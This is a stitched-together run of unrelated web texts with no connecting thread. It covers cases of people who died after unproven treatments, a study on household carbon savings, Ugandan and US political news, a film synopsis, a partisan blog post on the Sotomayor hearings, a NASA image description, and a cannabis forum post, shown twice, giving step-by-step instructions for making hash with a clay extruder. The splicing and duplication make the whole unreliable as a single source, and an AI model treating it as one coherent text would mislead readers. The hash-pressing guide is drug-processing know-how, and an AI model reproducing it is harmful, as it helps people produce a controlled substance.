Henderson , Nevada Died ( seizure / drowning )
October 18 , 2007
The son of actress Hunter Tylo and actor Michael Tylo , he was counseled that his seizures were caused by familial stress & could be treated with therapy and acupuncture .
Later , he suffered a seizure , fell into a pool and drowned .
His mother has sued .
Read more
Johnny Warren ( athlete ) & 149 others Age : 61
Sydney , NSW , Australia Died ( cancer )
November 6 , 2004 A long - time smoker , he was diagnosed with lung cancer .
His family pleaded with him to give up the unproven " wonder drugs " he was being given in Queensland .
He died , and the doctor he was seeing was later investigated by authorities .
Read more & more
Go green , hang your washing out ( Image : silkegb / Getty )
If only Americans would hang their laundry out to dry – and commit 16 other acts of environmental kindness – they could slash US carbon dioxide emissions by 7.4 per cent by 2019 .
Thomas Dietz of Michigan State University in East Lansing and his team calculated the carbon - saving impact of 17 practices , such as eschewing tumble dryers , car pooling and buying fuel - efficient vehicles ( see the full list below ) .
By drawing on previous studies , Dietz estimated what proportion of the population could realistically be persuaded to change their behaviour using financial incentives , mass - media campaigns and so forth .
For example , 90 per cent of Americans are likely to take up better home insulation , though only 15 per cent would go in for car pooling .
Advertisement
The team found that by 2019 , US households could cut their annual emissions by 20 per cent – representing slightly more CO 2 than France spews out each year .
Canada and Australia should pay attention , too : Dietz reasons that these two countries , “ which have carbon profiles roughly comparable to that of the US ” , may be able to achieve similar savings .
Everyday shift
“ This study is the best estimate we have to date of how effectively behavioural change could cut US greenhouse gas emissions , ” says Ruth Rettie , who leads Project Charm , a group based at Kingston University in London that investigates ways in which people ’s behaviour could be influenced .
“ Everyday household practices – for example tumble drying or using air conditioning – are resistant to change because they are embedded in conceptions of comfort and convenience , ” says Rettie .
“ But with the right combination of policy tools and social marketing , interventions can result in major behaviour changes . ”
Journal reference : Proceedings of the National Academy of Sciences , DOI : 10.1073/pnas.0908738106
17 things you can do to reduce your carbon footprint Weather - proof your house : seal drafts , insulate lofts , triple - glaze windows Centralise your air - conditioning system Install low - flow showerheads
Get a more efficient water heater Use energy - efficient appliances
Fit low rolling - resistance tyres to cars : they minimise the energy wasted as heat as the tyre rolls down the road
Use a fuel - efficient vehicle Change the air filters on your centralised air conditioning Tune up your air conditioning : get annual professional inspection and maintain it well Get regular car maintenance checks
Wash your clothes at a cooler temperature
Turn the temperature on your water heater down Stop leaving unused appliances on standby settings , which use power Turn your thermostat down Avoid the tumble dryer : line - dry washing Drive at a maximum of 90 kilometres per hour ( 55 miles per hour )
Car pool and “ trip - chain ” , running errands together
Ugandan President Yoweri Museveni on Friday warned Somali militias who have threatened attacks on Uganda 's capital Kampala and Burundi's capital Bujumbura .
Museveni told reporters here that should the militias dare attack Kampala , they will be attacked wherever they may be hiding .
" Those terrorists I would advise them to concentrate on solving their problems .
If they try to attack Uganda then they will pay because we know how to attack those who attack us and they are not in heaven , " he said .
Somali hardline Al Shabaab insurgents on Thursday were reported to have threatened to launch assaults on the capitals of the two East African countries to avenge what they called an indiscriminate attack in Mogadishu by the African Union peacekeepers .
The Thursday attack which is reported to have been sparked off by the insurgents ' mortar attack at the airport where Somali President Sheik Sherif Sheik Ahmed was about to board a plane to an AU Summit in Uganda , left over 20 people dead and 65 injured .
Museveni said that the insurgents should instead give time to the transitional government there to fix a timetable for elections instead of causing trouble .
" If they want to get power then they can get power by people voting for them .
But to say that they will use guns to kill Somalis and then also threaten us , they are backing the wrong horse , they will get the punishment they are looking for , " he said .
The insurgents ' threats came barely three weeks after the Ugandan military arrested a Somali minister in Kampala following a tip off that a Somali insurgent had entered the country .
The minister was released after a night of questioning .
Source : Xinhua
Agriculture , transportation and small businesses exempt from Boxer - Kerry
Only 2 % of companies are covered by the Clean Energy Jobs and American Power Act , but that 2 % represents 70 % of US emissions , says Senator John Kerry ( D - Mass . ) , the bill ’s co-sponsor .
[ social_buttons ]
With the United Nations signaling lower expectations for a climate treaty in Copenhagen , Sen .
John Kerry is expressing confidence that the Senate will be able to vote on a bill before the upcoming Copenhagen climate talks in December .
Speaking to a group of young climate leaders on Tuesday evening , Kerry said natural gas and nuclear power will likely play a larger role in the Senate bill than they did in the House version , simply because they were necessary to get the 60 votes needed for passage .
But Senator Kerry also said that despite those healthy incentives for natural gas and nuclear , “ The market will end up deciding who the winners are . ”
Kerry then added adding that he ’s willing to bet the winners will be efficiency and renewables brought on by an “ extraordinary explosion ” in wind , solar and energy efficiency .
“ Do n’t be scared of this , ” Kerry said of the task that lay ahead .
What people ought to be scared of , said Kerry , is that China , Germany and India are all moving ahead by building these new clean energy industries and growing jobs .
Despite strong opposition from some large corporations , and from the U.S. Chamber of Commerce , to any legislation that would put a cap on carbon emissions , several major corporations have voiced support for the Clean Energy Jobs and American Power Act .
Kerry cited companies such as Dupont , GE , Dow , American Electric and Cisco Systems that have all thrown support behind the bill , in part , because they recognize the incredible job growth potential of it .
“ America ’s competitiveness and America ’s jobs will be created out of this revolution , ” said Kerry .
Follow Tim Hurst on twitter
Image : James Jordan via flickr
Best - selling novelist Paul Sheldon is on his way home from his Colorado hideaway after completing his latest book , when he crashes his car in a freak blizzard .
Paul is critically injured , but is rescued by former nurse Annie Wilkes , Paul 's " number one fan " , who takes Paul back to her remote house in the mountains ( without bothering to tell anybody ) .
Unfortunately for Paul , Annie is also a headcase .
When she discovers that Paul has killed off the heroine in her favorite novels , her reaction leaves Paul shattered ( literally ) ...
Written by Andrew Backhouse ( andback74 )
Parker does as good a job as anyone I 've seen in calling out the Republican Senators in her own party not only for their blatant racism but also for the blatant sexism they had on display for the whole world to see during Sotomayor 's confirmation hearing :
Questions posed to Sotomayor about her temperament -- is she a bully ?
-- probably would n't be posed to a similarly qualified man .
Judicial temperament is a legitimate concern , of course .
But watching Sotomayor take questions about her moods from the nearly all - male Senate Judiciary Committee , one could n't help wondering how those same fellows would hold up under similar scrutiny while a roomful of women took aim at their . . . fortitude .
Obviously , we 're talking about Republican chaps .
Based on the Sotomayor hearings , it is certainly easy to see why the GOP has a serious gender problem .
The Republican Senators in the Committee room appeared to not have a clue how they came across to most women , or to any man who has even an inkling of sensitivity about gender fairness and equity .
Parker tries to give them a clue :
Here 's what women hear when men ask a female candidate about her temperament : " Are you really the bitch everybody says you are ? "
Men can be temperamental and still be great ; women are merely impossible to deal with .
Why is that ?
While Sotomayor is pondering some of the Deep Thoughts suggested by her interrogators , perhaps those same wise blancos might give that question some reflection .
Parker also calls out her party for the embarrassing , unforgiveable racism the Republican Senators spewed forth with a renewed sense of relish and vigor during the hearings .
Senators also hammered Sotomayor about her ethnic identification and whether she could rule fairly without undue influence from her gender or political preferences .
Wait , let me guess , you 're white guys !
Are we to infer that men of European descent are never unduly influenced by their own ethnicity , gender or political preferences ?
Can anyone affirm this assertion with a straight face ?
When your party looks like a Wonder Bread convention during flu season , picking on ethnic identity and sex seems like an un-brilliant way to proceed .
Yet , these same gentlemen do n't understand how Sotomayor could have expressed the thought that she , as a Latina , might be able to reach a wiser decision than a white man ?
After watching the GOP self - destruct at the Sotomayor hearings , GOPer Parker is as concerned as many here on dkos that her party is cementing its minority party status for years to come , denying our country a vigorous two - party democracy .
It appears that at least a few Republicans joined me in scratching their heads , trying to figure out exactly what the party was thinking when it mapped out its game plan for the hearing .
It 's hard to figure what Republicans could have been thinking .
It 's nearly a foregone conclusion that Sotomayor will be confirmed .
Essentially attacking her personality is , at minimum , bad political strategy .
The first Latina to rise to the highest bench with a record of accomplishment few can match is n't the best person for target practice when Hispanic voters are the golden means to a political future ....
It concerns me that the Democratic Party may not have enough worthy adversaries in coming years to save us from the tyranny of sustained one - party rule .
If confirmed , Sotomayor soon will blend into the folds of black robes as all the others have , and few will remember what the fuss was about .
Something about a wise Latina .
Did she wink ?
But those who picked the wrong battles during her confirmation , reminding Americans that they are blind to their own biases and attitudes , may find themselves increasingly lonely in that great big tent .
I doubt that Republican leaders are going to listen to the words of a " relatively " reasonable conservative like Parker ; it just does n't jive with the " Palin crowd " mentality that seems to dominate the party right now .
In fact , I 'm starting to believe more and more that what we witnessed at the Sotomayor hearings were the beginnings of a deliberate attempt by the GOP leadership to reposition itself for the future as the party of " white male resentment , " as voiced by Pat Buchanan 's recent lunatic rantings .
And that 's an even scarier thought , that this was all part of a master GOP plan rather than just evidence of a party flailing in disarray .
Either way , we need to prepare ourselves for a lot more ugly as we witness the last gasps of an increasingly irrelevant Republican Party .
What does Earth look like when viewed from Mars ?
At 13:00 GMT on 8 May 2003 , the Mars Global Surveyor ( MGS ) Mars Orbiter Camera ( MOC ) had an opportunity to find out .
In addition , a fortuitous alignment of Earth and Jupiter --- the first planetary conjunction viewed from another planet --- permitted the MOC to acquire an image of both of these bodies and their larger satellites .
At the time , Mars and the orbiting camera were 139 million kilometers ( 86 million miles ) from Earth and almost 1 billion kilometers ( nearly 600 million miles ) from Jupiter .
The orbit diagram , above , shows the geometry at the time the images were obtained .
Because Jupiter is over 5 times farther from the Sun than Earth , two different exposures were needed to image the two planets .
Mosaiced together , the images are shown above ( top picture ) .
The composite has been highly contrast - enhanced and " colorized " to show both planets and their satellites .
The MGS MOC high resolution camera only takes grayscale ( black - and - white ) images ; the color was derived from Mariner 10 and Cassini pictures of Earth / Moon and Jupiter , respectively , as described in the note below .
Earth / Moon :
This is the first image of Earth ever taken from another planet that actually shows our home as a planetary disk .
Because Earth and the Moon are closer to the Sun than Mars , they exhibit phases , just as the Moon , Venus , and Mercury do when viewed from Earth .
As seen from Mars by MGS on 8 May 2003 at 13:00 GMT ( 6:00 AM PDT ) , Earth and the Moon appeared in the evening sky .
The MOC Earth / Moon image has been specially processed to allow both Earth ( with an apparent magnitude of - 2.5 ) and the much darker Moon ( with an apparent magnitude of +0.9 ) to be visible together .
The bright area at the top of the image of Earth is cloud cover over central and eastern North America .
Below that , a darker area includes Central America and the Gulf of Mexico .
The bright feature near the center - right of the crescent Earth consists of clouds over northern South America .
The image also shows the Earth - facing hemisphere of the Moon , since the Moon was on the far side of Earth as viewed from Mars .
The slightly lighter tone of the lower portion of the image of the Moon results from the large and conspicuous ray system associated with the crater Tycho .
Jupiter / Galilean Satellites :
When Galileo first turned his telescope toward Jupiter four centuries ago , he saw that the giant planet had four large satellites , or moons .
These , the largest of dozens of moons that orbit Jupiter , later became known as the Galilean satellites .
The larger two , Callisto and Ganymede , are roughly the size of the planet Mercury ; the smallest , Io and Europa , are approximately the size of Earth 's Moon .
This MGS MOC image , obtained from Mars orbit on 8 May 2003 , shows Jupiter and three of the four Galilean satellites : Callisto , Ganymede , and Europa .
At the time , Io was behind Jupiter as seen from Mars , and Jupiter 's giant red spot had rotated out of view .
This image has been specially processed to show both Jupiter and its satellites , since Jupiter , at an apparent magnitude of - 1.8 , was much brighter than the three satellites .
A note about the coloring process :
The MGS MOC high resolution camera only takes grayscale ( black - and - white ) images .
To " colorize " the image , a Mariner 10 Earth / Moon image taken in 1973 was used to color the MOC Earth and Moon picture , and a recent Cassini image acquired during its Jupiter flyby was used to color the MOC Jupiter picture .
The procedure used was as follows : the Mariner 10 and Cassini color images were converted from 24 - bit color to 8 - bit color using a JPEG to GIF conversion program .
These 8 - bit color images were converted to 8 - bit grayscale and an associated lookup table mapping each gray value of that image to a red - green - blue color triplet ( RGB ) .
Each color triplet was root - sum - squared ( RSS ) , and sorted in increasing RSS value .
These sorted lists were brightness - to - color maps for their respective images .
Each brightness - to - color map was then used to convert the 8 - bit grayscale MOC image to an 8 - bit color image .
This 8 - bit color image was then converted to a 24 - bit color image .
The color image was edited to return the background to black .
Three separate color tables were used : one each for the Earth , Moon and Jupiter .
Jupiter 's Galilean Satellites were not colored .
To view the unprocessed Earth / Moon image , download the following to your desktop and view with your favorite image viewing or processing tool : R05-00763.gif .
To view the unprocessed Jupiter image , download the following to your desktop and view with your favorite image viewing or processing tool : R05-00762.gif .
Pipedream Proudly Growing My Own Since 1969
Join Date : Feb 2006 Posts : 774
THE ULTIMATE PERSONAL PROFESSIONAL HASH PRESS FOR UNDER 20 BUCKS !!
As a medical user , I ’ve found that processing my herb into pieces of hash has many advantages .
It will store for very long periods of time ( years ) , consistent dosing is easier , there is no degradation of the quality as a result of long - term storage , it burns very evenly , is very easy to transport , and various other factors as well .
The issue is , the equipment available for pressing herb or its resin into hash can be expensive , large and cumbersome , work poorly , or is so small that it is difficult to operate for someone with reduced hand - strength .
There are also numerous DIY units that can be made from plumbing items , but the quality just is n’t there and not everyone is up to the challenge .
Up to now , the best compromise has been a press known as the Piecemaker® .
THEIRS -$ 300 vs. MINE -$ 20
Theirs is a true quality item , however , you must be willing to hand over almost $ 300 U.S. and share your personal info on - line to order one .
Alternatively , here is a simple solution that easily makes perfect hash , is readily available , easy to operate , requires no assembly , looks very professional , and can be had on sale for under 20 bucks U.S.
The item I am suggesting is a Makin’s ® Professional Ultimate Clay Extruder .
That ’s right , available at most larger craft stores , and designed to work with fimo - clay , this item makes the perfect personal hash press .
In fact , it looks almost identical to the $ 300 Piecemaker ® just a bit smaller and less than 1/10th the price !
So , instead of me writing more about the unit itself , why do n’t I just show you how it can make perfect Black Tar Hash , or any other type that you may fancy … ……
My unit came packaged like this with 20 different extruding disks .
Unless you are planning on making beads and decorations , dump everything except the Press and the two disks with the smallest round holes .
As you can see from this disassembled shot , this is a quality item that will be easy to clean and even has an “ O - Ring ” around the brass ram .
The actual process goes like this .
Place both disks in the end - cap .
The one with the smaller hole should be on top so to be closest to the hash being made .
If you are going to use un - sifted plant matter , make sure it is fully covered with glands , and ground as fine as possible .
For this demo , I ’ll use my favorite measure , which is 1.1 grams of the finest material I have .
Now unscrew the plunger and fill the tube with the desired amount of product you want to use .
Also , another step I take which is totally not necessary is to insert 2 US dimes .
One in the cap and one against the plunger .
This will make a perfect impression on the surface of my finished hash , much like a trademark .
Now screw on the end - cap and turn the plunger down until its nice and snug .
DON ” T OVER - TIGHTEN IT !
Now we 'll continue to tightenit in steps .
It will work much better and remember that this is an aluminium unit we do n’t want to destroy it .
Once it nice and snug , wait 30 seconds and give it another 1/8th turn .
Now repeat the " 30 second wait and 1/8th turn " process about six times .
This final step will put a shinny sealed surface on your hash that will protect it from falling apart or loss of potency for years to come .
Using a hair - dryer , small space - heater , or other safe heat source , warm up the end of your press .
Slowly keep rotating the unit as a whole .
This will assure that the heat is evenly distributed .
It should get very , very warm , but not so hot that you ca n’t touch it .
While keeping it warmed , repeat the " 1/8th turn and 30 second wait " process about five more times .
The hotter you get it , the darker and denser your end product will be .
To remove your hash , allow the unit to cool to room temperature .
Then back off the ram a turn or two .
Unscrew the end - cap , and turn the ram all the way down pushing the hash out .
After each days use , fully disassemble & clean the unit with ISO alcohol and allow to air - dry .
Here ’s a sample piece that I made with the impression of the dime .
Keep this in mind , the better the quality of your starting material , and the finer its ground , the less heat and pressure it will require to hold together .
If you choose to use pure sifted glands , virtually no heat will be required .
And , if your material is not as good as you wish it was , adding one drop of ISO or Olive Oil per gram of material inside the press will help it hold together better .
That ’s about it .
Good luck & get pressing .
If you have any questions or comments I ’d love to hear them so post away or send me a PM .
Grow Smart & Grow Safe
Pipedream
Those that know me , realize that I seldom start threads .
I ’m not one for throwing stuff out there just for a reaction .
If you have something of value to contribute to a thread you should post it , but if you do n’t , just browse , read , and learn .
As such , this is only the third thread that I ’ve started on IC .
The other two , my personal - grow thread ( see link in signature ) , and the 150wHPS Club , have both become active “ Stickys ” .
It ’s my hope that this new thread will offer valuable information as well , and potentially save readers a big chunk of change and a lot of aggravation .
As a medical user , I ’ve found that processing my herb into pieces of hash has many advantages .
It will store for very long periods of time ( years ) , consistent dosing is easier , there is no degradation of the quality as a result of long - term storage , it burns very evenly , is very easy to transport , and various other factors as well .
The issue is , the equipment available for pressing herb or its resin into hash can be expensive , large and cumbersome , work poorly , or is so small that it is difficult to operate for someone with reduced hand - strength .
There are also numerous DIY units that can be made from plumbing items , but the quality just is n’t there and not everyone is up to the challenge .
Up to now , the best compromise has been a press known as the Piecemaker® .
Theirs is a true quality item , however , you must be willing to hand over almost $ 300 U.S. and share your personal info on - line to order one .
Alternatively , here is a simple solution that easily makes perfect hash , is readily available , easy to operate , requires no assembly , looks very professional , and can be had on sale for under 20 bucks U.S.
The item I am suggesting is a Makin’s ® Professional Ultimate Clay Extruder .
That ’s right , available at most larger craft stores , and designed to work with fimo - clay , this item makes the perfect personal hash press .
In fact , it looks almost identical to the $ 300 Piecemaker ® just a bit smaller and less than 1/10th the price !
So , instead of me writing more about the unit itself , why do n’t I just show you how it can make perfect Black Tar Hash , or any other type that you may fancy … …
… My unit came packaged like this with 20 different extruding disks .
Unless you are planning on making beads and decorations , dump everything except the Press and the two disks with the smallest round holes .
As you can see from this disassembled shot , this is a quality item that will be easy to clean and even has an “ O - Ring ” around the brass ram .
The actual process goes like this .
Place both disks in the end - cap .
The one with the smaller hole should be on top so to be closest to the hash being made .
If you are going to use un - sifted plant matter , make sure it is fully covered with glands , and ground as fine as possible .
For this demo , I ’ll use my favorite measure , which is 1.1 grams of the finest material I have .
Now unscrew the plunger and fill the tube with the desired amount of product you want to use .
Also , another step I take which is totally not necessary is to insert 2 US dimes .
One in the cap and one against the plunger .
This will make a perfect impression on the surface of my finished hash , much like a trademark .
Now screw on the end - cap and turn the plunger down until its nice and snug .
DON ” T OVER - TIGHTEN IT !
Now we 'll continue to tightenit in steps .
It will work much better and remember that this is an aluminium unit we do n’t want to destroy it .
Once it nice and snug , wait 30 seconds and give it another 1/8th turn .
Now repeat the " 30 second wait and 1/8th turn " process about six times .
This final step will put a shinny sealed surface on your hash that will protect it from falling apart or loss of potency for years to come .
Using a hair - dryer , small space - heater , or other safe heat source , warm up the end of your press .
Slowly keep rotating the unit as a whole .
This will assure that the heat is evenly distributed .
It should get very , very warm , but not so hot that you ca n’t touch it .
While keeping it warmed , repeat the " 1/8th turn and 30 second wait " process about five more times .
The hotter you get it , the darker and denser your end product will be .
To remove your hash , allow the unit to cool to room temperature .
Then back off the ram a turn or two .
Unscrew the end - cap , and turn the ram all the way down pushing the hash out .
After each days use , fully disassemble & clean the unit with ISO alcohol and allow to air - dry .
Here ’s a sample piece that I made with the impression of the dime .
Keep this in mind , the better the quality of your starting material , and the finer its ground , the less heat and pressure it will require to hold together .
If you choose to use pure sifted glands , virtually no heat will be required .
And , if your material is not as good as you wish it was , adding one drop of ISO or Olive Oil per gram of material inside the press will help it hold together better .
That ’s about it .
Good luck & get pressing .
If you have any questions or comments I ’d love to hear them so post away or send me a PM .
Grow Smart & Grow SafePipedream
" I was so much older then , I 'm younger than that now "
Link To : Pipedream 's 150w Tiny Bubbler System __________________
Last edited by Pipedream ; 12-06-2007 at 03:52 PM
..
Copyright © Metku.net , All Rights Reserved .
All content and graphics in MetkuMods are sole property of Jani Pönkkö and may not be reproduced or copied in any manner without written permission from him .
All brand names , trademarks and copyrights are the property of their respective owners .
All content and graphics in MetkuMods are sole property of Jani Pönkkö and may not be reproduced or copied in any manner without written permission from him .
All brand names , trademarks and copyrights are the property of their respective owners .
Privacy Policy
